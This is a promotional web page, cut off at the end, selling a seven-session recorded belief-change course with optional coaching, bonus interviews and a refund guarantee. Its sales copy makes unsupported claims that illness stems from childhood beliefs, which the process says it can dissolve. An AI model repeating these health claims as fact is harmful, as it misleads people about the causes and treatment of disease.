Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at 